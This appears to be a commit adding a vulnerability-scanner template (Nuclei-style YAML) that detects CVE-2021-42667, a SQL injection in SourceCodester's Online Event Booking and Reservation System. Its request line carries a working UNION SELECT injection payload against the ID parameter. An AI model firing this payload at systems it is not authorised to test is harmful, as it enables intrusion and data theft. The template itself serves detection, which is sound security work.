Create CVE-2021-42667.yaml

A SQL Injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP in event-management/views. An attacker can leverage this vulnerability in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server.

cves/2021/CVE-2021-42667.yaml

@@ -0,0 +1,36 @@
+id: CVE-2021-42667
+
+info:
+  name: SourceCodester Online Event Booking and Reservation System version 2.3.0 - SQL injection
+  author: fxploit
+  severity: critical
+  description: |
+    A SQL Injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP in event-management/views. An attacker can leverage this vulnerability in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-42667
+    - https://github.com/0xDeku/CVE-2021-42667
+    - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
+
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-42667
+    cwe-id: CWE-89
+  tags: sourcecodester,injection,cve,cve2021
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/event-management/views/?v=USER&ID=1 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL;-- -"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "MariaDB"
+          - "MySQL"
+
+      - type: status
+        status:
+          - 200